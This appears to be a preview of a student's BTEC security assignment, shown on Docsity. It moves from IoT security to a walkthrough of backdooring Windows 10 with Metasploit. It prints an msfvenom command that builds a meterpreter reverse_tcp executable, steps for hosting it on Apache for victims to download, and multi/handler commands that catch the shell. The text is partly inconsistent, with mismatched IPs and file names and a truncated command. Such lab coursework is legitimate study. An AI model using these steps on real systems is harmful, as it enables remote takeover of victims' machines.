









Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
Assignment 1 security grade pass
Typology: Schemes and Mind Maps
1 / 17
This page cannot be seen from the preview
Don't miss anything!










Qualification BTEC Level 5 HND Diploma in Computing Unit number and title Unit 5 : Security Submission date April 30, 2023 Date Received 1st submission April 30, 2023 Re-submission Date May 9 , 2023 Date Received 2nd submission May 9 , 2023 Student Name Dang Le Tuan Kiet Student ID GCS210 900 Class GCS1004B Assessor name Nguyen Xuan Sam Student declaration I certify that the assignment submission is entirely my own work and I fully understand the consequences of plagiarism. I understand that making a false declaration is a form of malpractice. Studentâs signature Kiet Grading grid
Grade: Assessor Signature: Date: Lecturer Signature:
1. Introduction. The Internet of Things (IoT) is a network of interconnected devices that can interact with each other and with the users. It is a system that is becoming increasingly popular in modern society, enabling greater efficiency and ease of use. However, with the rapid expansion of IoT, there has been a corresponding rise in the number and complexity of security threats. Traditional security solutions have been found to be inadequate in protecting IoT systems due to the unique attributes of this technology. (Kim and Solomon, 2010) posited that the IoT's distributed architecture and diverse devices pose significant challenges for security measures. As we continue to rely more heavily on IoT, there is an urgent need to address these security concerns to prevent potential cyber-attacks. In this report, we will examine the security challenges presented by IoT and explore effective security solutions to mitigate the risks. Figure 1. IoT (2021). 1.1 Motivations. The research of backdoor attacks on Win 10 utilizing the meta exploit that we present can be motivated by a number of factors, including: - Understanding the operating system's weaknesses in Windows 10. Researchers can find the system's possible flaws and vulnerabilities by conducting a backdoor attack utilizing the meta exploit to get access to the camera on a Win 10 device. - Creating better defenses against backdoor attacks: Knowing how backdoor assaults operate can help create stronger defenses against them in the future, enhancing system security as a whole.
(IoT) devices that employ cutting-edge security mechanisms including encryption and authentication approaches is proposed. These recent linked works underscore the need of safeguarding IoT devices from backdoor attacks and other forms of cyber threats. Additionally, they highlight the possible weaknesses of IoT devices and how to protect them from attacks using the Metasploit framework and other techniques.
3. Investigation backdoor attacks using meta framework exploits. The Metasploit Framework is a modular, Ruby-based penetration testing platform that lets you create, test, and run attack code. You may use the tools in the Metasploit Framework to perform attacks, enumerate networks, test security vulnerabilities, and avoid detection. In essence, the Metasploit Framework is a set of widely used tools that offer a full environment for penetration testing and exploit creation.(Odumosu, 2016) Using Metasploit, researchers may develop and execute a range of cyberattacks, such as backdoor attacks, on target systems to find possible vulnerabilities and evaluate their degree of security. This helps find weaknesses in the system that malicious hackers may exploit to gain unauthorized access or control. Such research provides insights into the tactics, procedures, and procedures that attackers use to exploit security flaws in computer systems and IoT devices. Additionally, it highlights how important it is to safeguard computer systems and Internet of Things (IoT) devices from backdoor assaults and how dangerous they can be. In order to protect computer systems, apps, and IoT devices from online threats, stronger cybersecurity defenses may be developed using the information gleaned from backdoor assaults carried out with the Metasploit framework. This calls for the development of safer coding practices, stronger authentication and encryption protocols, and enhanced incident response strategies. This area of study greatly improves the security and resilience of computer systems and IoT devices by identifying possible holes and developing robust security methods to address them. 4. Results and discussions. 4.1. Tool setup and installation. This section, which describes how we might be able to attack and exploit the Windows 10 system, must be included in the report before the implementation section. First, we hack the victim's Win 10 system through the VMware Kali Linux. As a result, in order to hack the Win 10 system ethically, we must use the VMware to create malware that will infect the Win 10 system. The victim of this report's attack is the Win10 operating
system. To create malware, we utilize VMware and the Kali Linux tool for the Metasploit Framework. Before we perform the hacking approach, it's crucial to explain basic coding skills because this report will primarily use "msfvenom" to create malware as well as save the "exe" file type.
Figure 5. Open Kali Linux.
Figure 7. Virtual Machine Settings.
Figure 10. ifconfig command. 2: use command â$ service apache2 start $ msfvenom - p windows/meterpreter/reverse_tcp - a x86 â platform windows - f exe LHOST=192.168.1.4 LPORT=4444 - o a.exeâ to create abc.exe malware file. Figure 11. Create malware file. 3: move the abc.exe file into the âsystem file/var/www/htmlâ.
Figure 11. Move malware file. 4: When someone access to the IP address 192.168.65.168/abc.exe, they will automatically download the file. Figure 12. Apache2 page. 5: From that, you can attack by using Metasploit frameworkâs commands:â msf6 > use multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.65.
Figure 15. Successfully result.
5. Conclusion.
REFERENCES KIM, D. & SOLOMON, M. G. 2010. Fundamentals of information systems security , Jones & Bartlett Publishers. ODUMOSU, J. O. 2016. A framework for reverse TCP backdoor attack and computer forensic on Linux OS. Morgan State University.